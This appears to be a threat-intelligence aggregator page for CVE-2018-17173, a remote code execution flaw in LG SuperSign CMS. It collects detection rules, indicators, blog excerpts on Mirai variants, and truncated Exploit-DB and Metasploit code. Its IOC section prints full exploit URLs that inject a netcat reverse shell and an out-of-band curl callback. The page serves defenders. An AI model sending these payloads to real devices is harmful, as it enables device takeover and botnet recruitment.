CVE-2018-17173
published 2018-09-21CVE-2018-17173: LG SuperSign CMS allows remote attackers to execute arbitrary code via the sourceUri parameter to qsr_server/device/getThumbnail.
PriorityP190critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
56.24%
98.9th percentile
LG SuperSign CMS allows remote attackers to execute arbitrary code via the sourceUri parameter to qsr_server/device/getThumbnail.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| lg | supersign_cms | — | — |
Detection & IOCsextracted from sources · hover to see the quote
url/qsr_server/device/getThumbnail?sourceUri='%20-;rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%20<lhost>%20<lport>%20%3E%2Ftmp%2Ff;'&targetUri=%2Ftmp%2Fthumb%2Ftest.jpg&mediaType=image&targetWidth=400&targetHeight=400&scaleType=crop&_=1537275717150↗
urlGET /qsr_server/device/getThumbnail?sourceUri=\'%2b-%253brm%2b/tmp/f%253bmkfifo%2b/tmp/f%253bcat%2b/tmp/f|/bin/sh%2b-i%2b2>%25261|curl%2bhttp%253a//{{interactsh-url}}%2b>/tmp/f%253b\';&targetUri=%2Ftmp%2Fthumb%2Ftest.jpg&mediaType=image&targetWidth=400&targetHeight=400&scaleType=crop&_=1537275717150 HTTP/1.1
snort
alert http $EXTERNAL_NET any -> $HOME_NET 9080 (msg:"ET EXPLOIT Possible LG SuperSign EZ CMS 2.5 RCE (CVE-2018-17173)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/qsrserver/device/getThumbnail?sourceUri=|22|"; startswith; fast_pattern; content:"|3b|"; within:40; content:"&targetUri="; distance:0; content:"&scaleType="; distance:0; reference:url,www.exploit-db.com/exploits/45448; reference:cve,2018-17173; classtype:attempted-admin; sid:2027089; rev:6; metadata:attack_target IoT, created_at 2019_03_18, cve CVE_2018_17173, deployment Perimeter, performance_impact Low, confidence Medium, signature_severity Major, updated_at 2024_04_13;)
- →Exploit traffic targets TCP port 9080, which is the fixed default port for LG SuperSignEZ CMS. Restrict or monitor inbound HTTP to this port. ↗
- →Detect GET requests to /qsr_server/device/getThumbnail (or /qsrserver/device/getThumbnail) containing a quote character in the sourceUri parameter followed by shell metacharacters (semicolons, pipe characters) and the &targetUri= and &scaleType= parameters.
- →The Mirai variant exploiting this CVE is detected as IoT.Linux.MIRAI.VWISI and uses XOR key 0x04 to encrypt embedded credentials. ↗
- →Use FOFA query title="LG SuperSign" to identify exposed LG SuperSign CMS instances on the internet for asset discovery and attack surface reduction.
- →Trend Micro DDI rule 2865 specifically covers this CVE: '2865 - CVE-2018-17173 LG Supersign Remote Code Execution - HTTP (Request)'. ↗
- →The exploit payload drops a named pipe at /tmp/f and spawns a reverse shell via /bin/sh piped through netcat. Monitor for creation of /tmp/f and anomalous netcat processes on LG WebOS-based devices. ↗
- ·The Snort/Suricata rule (ET sid:2027089) uses /qsrserver/ (no underscore) in the URI content match, while the actual exploit path in PoC code uses /qsr_server/ (with underscore). Ensure your detection covers both variants.
- ·The Nuclei template uses an out-of-band interaction (interactsh) to confirm exploitation; it will not fire in environments without external DNS/HTTP callback visibility.
- ·The Metasploit module defaults to payload 'cmd/unix/reverse_netcat', requiring netcat to be present on the target. Actual attacker payloads may differ. ↗
CVSS provenance
nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-qgg8-99p6-v8v8: LG SuperSign CMS allows remote attackers to execute arbitrary code via the sourceUri parameter to qsr_server/device/getThumbnail
ghsa_unreviewed·2022-05-14
CVE-2018-17173 [CRITICAL] CWE-94 GHSA-qgg8-99p6-v8v8: LG SuperSign CMS allows remote attackers to execute arbitrary code via the sourceUri parameter to qsr_server/device/getThumbnail
LG SuperSign CMS allows remote attackers to execute arbitrary code via the sourceUri parameter to qsr_server/device/getThumbnail.
VulnCheck
LG supersign_cms Improper Control of Generation of Code ('Code Injection')
vulncheck·2018·CVSS 9.8
CVE-2018-17173 [CRITICAL] LG supersign_cms Improper Control of Generation of Code ('Code Injection')
LG supersign_cms Improper Control of Generation of Code ('Code Injection')
LG SuperSign CMS allows remote attackers to execute arbitrary code via the sourceUri parameter to qsr_server/device/getThumbnail.
Affected: LG supersign_cms
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/; https://www.akamai.com/blog/security/latest-echobot-26-infection-vectors; https://web.archive.org/web/20200319160240/https://labs.bitdefender.com/2020/01/hold-my-beer-mirai-spinoff-named-liquorbot-incorporates-cryptomining/; https://www.trendmicro.com/en_us/research/20/g/new-
Suricata
ET EXPLOIT LG SuperSign EZ CMS 2.5 Remote Code Execution CVE-2018-17173
suricata·2020-06-11·CVSS 9.8
CVE-2018-17173 [CRITICAL] ET EXPLOIT LG SuperSign EZ CMS 2.5 Remote Code Execution CVE-2018-17173
ET EXPLOIT LG SuperSign EZ CMS 2.5 Remote Code Execution CVE-2018-17173
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT LG SuperSign EZ CMS 2.5 Remote Code Execution CVE-2018-17173"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/qsr_server/device/getThumbnail?sourceUri="; fast_pattern; content:"'&targetUri="; distance:0; reference:url,www.exploit-db.com/exploits/45448; reference:cve,2018-17173; classtype:attempted-admin; sid:2030317; rev:3; metadata:affected_product Linux, attack_target IoT, created_at 2020_06_11, cve CVE_2018_17173, deployment Perimeter, confidence High, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_07, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique
Suricata
ET EXPLOIT Possible LG SuperSign EZ CMS 2.5 RCE (CVE-2018-17173)
suricata·2019-03-18·CVSS 9.8
CVE-2018-17173 [CRITICAL] ET EXPLOIT Possible LG SuperSign EZ CMS 2.5 RCE (CVE-2018-17173)
ET EXPLOIT Possible LG SuperSign EZ CMS 2.5 RCE (CVE-2018-17173)
Rule: alert http $EXTERNAL_NET any -> $HOME_NET 9080 (msg:"ET EXPLOIT Possible LG SuperSign EZ CMS 2.5 RCE (CVE-2018-17173)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/qsrserver/device/getThumbnail?sourceUri=|22|"; startswith; fast_pattern; content:"|3b|"; within:40; content:"&targetUri="; distance:0; content:"&scaleType="; distance:0; reference:url,www.exploit-db.com/exploits/45448; reference:cve,2018-17173; classtype:attempted-admin; sid:2027089; rev:6; metadata:attack_target IoT, created_at 2019_03_18, cve CVE_2018_17173, deployment Perimeter, performance_impact Low, confidence Medium, signature_severity Major, updated_at 2024_04_13;)
Exploit-DB
LG Supersign EZ CMS - Remote Code Execution (Metasploit)
exploitdb·2019-05-06
CVE-2018-17173 LG Supersign EZ CMS - Remote Code Execution (Metasploit)
LG Supersign EZ CMS - Remote Code Execution (Metasploit)
---
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule 'LG Supersign EZ CMS RCE',
'Description' => %q{
LG SuperSignEZ CMS, that many LG SuperSign TVs have builtin, is prone
to remote code execution due to an improper parameter handling
},
'Author' => ['Alejandro Fanjul'],
'References' =>
[
[ 'CVE', '2018-17173' ],
[ 'URL', 'https://mamaquieroserpentester.blogspot.com/2018/09/lg-supersign-rce-to-luna-and-back-to.html']
],
'License' => MSF_LICENSE,
'Platform' => 'unix',
'Privileged' => false,
'DefaultOptions' =>
{
'PAYLOAD' => 'cmd/unix/reverse_netcat'
},
'Arch' => ARCH_CMD,
'Payload' =>
{
'Compat' =>
{
'PayloadType' => 'cmd
Exploit-DB
LG SuperSign EZ CMS 2.5 - Remote Code Execution
exploitdb·2018-09-24·CVSS 9.8
CVE-2018-17173 [CRITICAL] LG SuperSign EZ CMS 2.5 - Remote Code Execution
LG SuperSign EZ CMS 2.5 - Remote Code Execution
---
# Exploit Title: LG SuperSign EZ CMS 2.5 - Remote Code Execution
# Date: 2018-09-18
# Exploit Author: Alejandro Fanjul
# Vendor Homepage:https://www.lg.com
# Software Link: https://www.lg.com/ar/software-lg-supersign
# Version: SuperSignEZ 1.3
# Tested on: LG WebOS 3.10
# CVE : CVE-2018-17173
# 1. Description
# LG SuperSignEZ CMS, that many LG SuperSign TVs have built in, is prone
# to remote code execution due to an improper parameter handling
# 2. Proof of concept
# Code to exploit the vulnerability
import requests
from argparse import ArgumentParser
parser = ArgumentParser(description="SuperSign RCE")
parser.add_argument("-t", "--target", dest="target",
help="Target")
parser.add_argument("-l", "--lhost", dest="lhost",
help="lhost
Nuclei
LG Supersign EZ CMS - Remote Code Execution
nuclei·CVSS 9.8
CVE-2018-17173 [CRITICAL] LG Supersign EZ CMS - Remote Code Execution
LG Supersign EZ CMS - Remote Code Execution
LG SuperSign CMS allows remote attackers to execute arbitrary code via the sourceUri parameter to qsr_server/device/getThumbnail.
Template:
id: CVE-2018-17173
info:
name: LG Supersign EZ CMS - Remote Code Execution
author: pussycat0x
severity: critical
description: |
LG SuperSign CMS allows remote attackers to execute arbitrary code via the sourceUri parameter to qsr_server/device/getThumbnail.
impact: |
Unauthenticated attackers can execute arbitrary system commands on LG SuperSign CMS servers via the sourceUri parameter, leading to complete server compromise and potential access to connected digital signage systems.
remediation: |
Upgrade to a patched version of LG SuperSign CMS that addresses CVE-2018-17173.
reference:
- http://mamaquieros
Unit42
Two New IoT Vulnerabilities Identified with Mirai Payloads
blogs_unit42·2020-10-14
Two New IoT Vulnerabilities Identified with Mirai Payloads
Threat Research Center
Threat Research
Vulnerabilities
## Two New IoT Vulnerabilities Identified with Mirai Payloads
Ken Hsu
Yue Guan
Vaibhav Singhal
Qi Deng
Published: October 14, 2020
Threat Research
Vulnerabilities
IoT
Mirai
## Executive Summary
Palo Alto Networks is proactively trying to safeguard its customers from attacks however possible. By leveraging its Next-Generation Firewall as sensors on the perimeter to detect malicious payloads and attack patterns, Unit 42 researchers are able to hunt down the menaces out there on the network, be they known or not.
Unit 42 researchers have taken a closer look at four Mirai variants from two recently discovered campaigns leveraging command injection vulnerability exploits that reveal a familiar IoT attack pattern.
While t
Unit42
Two New IoT Vulnerabilities Identified with Mirai Payloads
blogs_unit42·2020-10-14
Two New IoT Vulnerabilities Identified with Mirai Payloads
## Executive Summary
Palo Alto Networks is proactively trying to safeguard its customers from attacks however possible. By leveraging its Next-Generation Firewall as sensors on the perimeter to detect malicious payloads and attack patterns, Unit 42 researchers are able to hunt down the menaces out there on the network, be they known or not.
Unit 42 researchers have taken a closer look at four Mirai variants from two recently discovered campaigns leveraging command injection vulnerability exploits that reveal a familiar IoT attack pattern.
While this generic approach allows researchers to observe the entire killchain and even acquire the malware binary from the attack, this post-exploitation heuristic does have its caveat: the traffic fingerprinting. Similar services yield similar traffi
Trendmicro
Neue Mirai-Variante für weitere Schwachstellen
blogs_trendmicro·2020-07-09·CVSS 8.8
CVE-2020-10173 [HIGH] Neue Mirai-Variante für weitere Schwachstellen
Malware
## Neue Mirai-Variante für weitere Schwachstellen
Eine neue Mirai-Variante nutzt neun Schwachstellen aus, die teilweise erstmalig betroffen sind.
By: Jemimah Molina, Augusto Remillano II Jul 09, 2020 Read time: ( words)
Save to Folio
Originalbeitrag von Agusuto Remillano II und Jemimah Molina
Eine neue Mirai-Variante ( IoT.Linux.MIRAI.VWISI ) nutzt neun Schwachstellen aus. Die bemerkenswerteste davon ist CVE-2020-10173 in Comtrend VR-3033-Routern, denn diese war von früheren Mirai-Varianten nicht betroffen. Die meisten Schwachstellen, die diese Mirai-Variante ausnutzt, bestehen aus einer Kombination aus Alt und Neu, die dazu beitragen, ein weites Netz zu spannen, das verschiedene Arten von angeschlossenen Geräten umfasst. Die neun in dieser Kampagne verwendeten Lücken betreff
Trendmicro
New Mirai Variant Expands, Exploits CVE-2020-1017
blogs_trendmicro·2020-07-08·CVSS 7.8
CVE-2020-10173 [HIGH] New Mirai Variant Expands, Exploits CVE-2020-1017
IoT
# New Mirai Variant Expands, Exploits CVE-2020-10173
We discovered a new Mirai variant that exploits nine vulnerabilities, most notable of which is CVE-2020-10173 in Comtrend VR-3033 routers which we have not observed exploited by past Mirai variants.
By: Augusto Remillano II, Jemimah Molina
2020/07/08
Read time: ( words)
Save to Folio
We discovered a new Mirai variant (detected as IoT.Linux.MIRAI.VWISI) that exploits nine vulnerabilities, most notable of which is CVE-2020-10173 in Comtrend VR-3033 routers which we have not observed exploited by past Mirai variants.
This discovery is a new addition to the Mirai variants that appeared in the past few months, that include SORA, UNSTABLE, and Mukashi. The case, however, showcases the ever-expanding arsenal of vulnerabilities new Mi
Unit42
Mirai Variant ECHOBOT Resurfaces with 13 Previously Unexploited Vulnerabilities
blogs_unit42·2019-12-13
Mirai Variant ECHOBOT Resurfaces with 13 Previously Unexploited Vulnerabilities
Threat Research Center
Threat Research
Malware
## Mirai Variant ECHOBOT Resurfaces with 13 Previously Unexploited Vulnerabilities
Ruchna Nigam
Published: December 13, 2019
Malware
Threat Research
Vulnerabilities
Echobot
IoT
IoT Vulnerability
Mirai
Mirai variant
## Executive Summary
Since the discovery of the Mirai variant using the binary name ECHOBOT in May 2019, it has resurfaced from time to time, using new infrastructure, and more remarkably, adding to the list of vulnerabilities it scans for, as a means to increase its attack surface with each evolution.
Unlike other Mirai variants, this particular variant stands out for the sheer number of exploits it incorporates, with the latest version having a total of 71 unique exploits, 13 of which haven’t been seen exploite
Unit42
Mirai Variant ECHOBOT Resurfaces with 13 Previously Unexploited Vulnerabilities
blogs_unit42·2019-12-13
Mirai Variant ECHOBOT Resurfaces with 13 Previously Unexploited Vulnerabilities
## Executive Summary
Since the discovery of the Mirai variant using the binary name ECHOBOT in May 2019, it has resurfaced from time to time, using new infrastructure, and more remarkably, adding to the list of vulnerabilities it scans for, as a means to increase its attack surface with each evolution.
Unlike other Mirai variants, this particular variant stands out for the sheer number of exploits it incorporates, with the latest version having a total of 71 unique exploits, 13 of which haven’t been seen exploited in the wild until now, ranging from extremely old CVEs from as long back as 2003, to recent vulnerabilities made public as recently as early December 2019. Based on this seemingly odd choice, one could risk a guess that the attackers could potentially be aiming for the sweet sp
Unit42
New Mirai Variant Adds 8 New Exploits, Targets Additional IoT Devices
blogs_unit42·2019-06-07·CVSS 9.8
[CRITICAL] New Mirai Variant Adds 8 New Exploits, Targets Additional IoT Devices
Executive Summary
Palo Alto Networks Unit 42 has been tracking the evolution of the Mirai malware, known for targeting embedded devices with the primary intent of launching DDoS attacks and self-propagation, since 2016 when it took down several notable targets.
As part of this ongoing research, we’ve recently discovered a new variant of Mirai that has eight new exploits against a wide range of embedded devices. These newly targeted devices range from wireless presentation systems to set-top-boxes, SD-WANs, and even smart home controllers.
Mirai initially made use of default credentials to gain access to devices. However, since the end of 2017, samples of the family have increasingly been observed making use of publicly available exploits to propagate and run on vulnerable devices.
2018
Unit42
New Mirai Variant Adds 8 New Exploits, Targets Additional IoT Devices
blogs_unit42·2019-06-07·CVSS 9.8
CVE-2017-5174 [CRITICAL] New Mirai Variant Adds 8 New Exploits, Targets Additional IoT Devices
Threat Research Center
Threat Research
Malware
## New Mirai Variant Adds 8 New Exploits, Targets Additional IoT Devices
Ruchna Nigam
Published: June 6, 2019
Malware
Threat Research
Vulnerabilities
CVE-2017-5174
CVE-2018-11510
CVE-2018-17173
CVE-2018-6961
CVE-2019-2725
CVE-2019-3929
Exploits
IoT
Linux
Mirai
Executive Summary
Palo Alto Networks Unit 42 has been tracking the evolution of the Mirai malware, known for targeting embedded devices with the primary intent of launching DDoS attacks and self-propagation, since 2016 when it took down several notable targets.
As part of this ongoing research, we’ve recently discovered a new variant of Mirai that has eight new exploits against a wide range of embedded devices. These newly targeted devices range from wireless prese
http://mamaquieroserpentester.blogspot.com/2018/09/lg-supersign-rce-to-luna-and-back-to.htmlhttp://packetstormsecurity.com/files/152733/LG-Supersign-EZ-CMS-Remote-Code-Execution.htmlhttps://www.exploit-db.com/exploits/45448/https://www.exploit-db.com/exploits/46795/http://mamaquieroserpentester.blogspot.com/2018/09/lg-supersign-rce-to-luna-and-back-to.htmlhttp://packetstormsecurity.com/files/152733/LG-Supersign-EZ-CMS-Remote-Code-Execution.htmlhttps://www.exploit-db.com/exploits/45448/https://www.exploit-db.com/exploits/46795/
2018-09-21
Published
Exploited in the wild